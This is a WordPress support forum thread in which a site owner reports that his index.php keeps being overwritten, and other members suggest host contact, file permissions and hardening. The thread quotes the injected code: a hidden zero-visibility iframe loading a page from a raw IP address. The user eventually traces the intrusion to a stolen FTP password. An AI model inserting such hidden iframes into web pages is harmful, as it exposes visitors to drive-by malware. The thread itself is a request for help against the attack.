WordPress.org

Forums

hacking wordpress (12 posts)

  1. gcicoira
    Member
    Posted 8 years ago #

    Hi, I have a problem with wordpress 2.0.5.
    Periodically my firstpage (index.php) was overwrite with this code:
    --------------------------------------------------------
    <iframe src="http://81.29.241.232/user2/adam0111/index.php" width="150" height="150" style="display:none"></iframe>
    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./wp-blog-header.php');
    ?>
    ---------------------------------------------------------

    see:
    http://www.cicoira.it

    Can I prevent this attack?

    thanks for Help!

  2. moshu
    Member
    Posted 8 years ago #

    1. Inform your host immediately about the hack. It might happen server-wide.
    2. Make sure you don't have any file or folder that is world writable (chmod 666 and 777, respectively).

    You may also want to read: http://codex.wordpress.org/Hardening_Wordpress

  3. drmike
    Member
    Posted 8 years ago #

    A quick Google search and some rough translating shows that that's probably the TR/Click.Small.KJ.31 virus. Not sure if that would be for teh server or your own PC when you uploaded the files.

  4. PozHonks
    Member
    Posted 8 years ago #

    Upload a good version of the index.php file and set the file permission to 444 (read only access, no write).
    If you need to change something, change the file permission to 644, do your editing, then come back to 444.
    It should protect you (not 100% guaranteed)
    You can do the same with the wp-config.php file.

  5. gcicoira
    Member
    Posted 8 years ago #

    hi
    if I change index.php permission to 444, i have this error:

    Internal Server Error
    The server encountered an internal error or misconfiguration and was unable to complete your request.

    Please contact the server administrator, postmaster@cicoira.it and inform them of the time the error occurred, and anything you might have done that may have caused the error.

    More information about this error may be available in the server error log.

    with permission 644 the file index.php will be replaced with hacking code...

    Help

  6. moshu
    Member
    Posted 8 years ago #

    You mean you put up a clean file and it gets infected instantly?
    What did you host say when you contacted them?

  7. gcicoira
    Member
    Posted 8 years ago #

    Hi,

    My host say that is a wordpress code problem.
    For my host it's all ok.

    My index.php is replaced every monday.

    Any Idea?

    thanks

  8. gcicoira
    Member
    Posted 8 years ago #

    Help

  9. Get a new host. It's not a WordPress code problem, and if they're not willing to help you fix it, then you don't need to be dealing with them.

  10. drmike
    Member
    Posted 8 years ago #

    Gotta agree. We've already told you the issue. Either your computer or your host's computer is infected.

  11. bradyjfrey
    Member
    Posted 8 years ago #

    3rd agree, get a new host, that's not a wordpress vulnerability.

  12. gcicoira
    Member
    Posted 8 years ago #

    Eureka!

    I have resolved my problem... I managed my blog with Net2ftp on my website http://www.cicoira.it/ftp and someone have sniffed my username/password. I have changed my FTP password for the website and I haven't got any problem.

    Thanks

    Gianpiero

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags